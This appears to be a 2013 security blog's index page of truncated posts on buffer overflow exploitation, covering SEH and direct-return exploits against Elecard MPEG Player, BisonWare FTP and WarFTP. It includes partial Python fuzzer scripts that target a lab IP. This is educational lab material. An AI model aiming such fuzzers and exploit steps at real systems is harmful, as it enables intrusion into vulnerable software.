Wednesday, 24 April 2013
Buffer Overflow : SEH based exploit on Elecard MPEG Player

In this post I will write up my steps to exploit a media player application (Elecard MPEG Player) with SEH protection. Here are the steps:
1. Install the application on a Windows XP machine
2. Do the information gathering about supported file types
3. From the information gathering I got this information: the target support...
Tuesday, 23 April 2013
Introducing SEH
SEH (Structured Exception Handling) is a protection integrated into a system or software to handle abnormal program flow that can cause the program to behave abnormally as well (crash, hang, etc.). SEH will prevent EIP from being overwritten directly by the excess data sent by the fuzzer. SEH will fully control the memory used by the software....
Friday, 19 April 2013
Buffer overflow : direct return exploit BisonWare FTP Server V3.5

1. Open the BisonWare FTP application
2. Test the connection with nc
3. Create a fuzzer script with Python
import socket
import sys
import time
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x41"*100
buffer+= "\r\n"
s.connect(('192.168.56.101',21))
print "Connecting...."
data = s.recv(1024)
time.sleep(3)
print...
Tuesday, 16 April 2013
Buffer overflow : find bad characters

Bad characters are characters that will make a payload fail to run because in the register they change into a random character (usually becoming byte 20).
Now I will try to find bad characters in the WarFTP application.
1. Run OllyDbg and attach the WarFTP application
2. Generate the byte characters with generatecode.pl...
Monday, 15 April 2013
Buffer overflow : direct return exploit warFTP application

Open and start warFTP application
test connection to warFTP
nc 192.168.56.101 21
Create fuzzer script with python :
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "\x41"*1000
s.connect(('192.168.56.101',21))
data = s.recv(1024)
print("Sending evil data via USER...
Wednesday, 10 April 2013
Buffer overflow : direct return exploit

A buffer overflow occurs when more data are written to a buffer than it can hold. The excess data is written to the adjacent memory, overwriting the contents of that location and causing unpredictable results in a program. Buffer overflows happen when there is improper validation (no bounds prior to...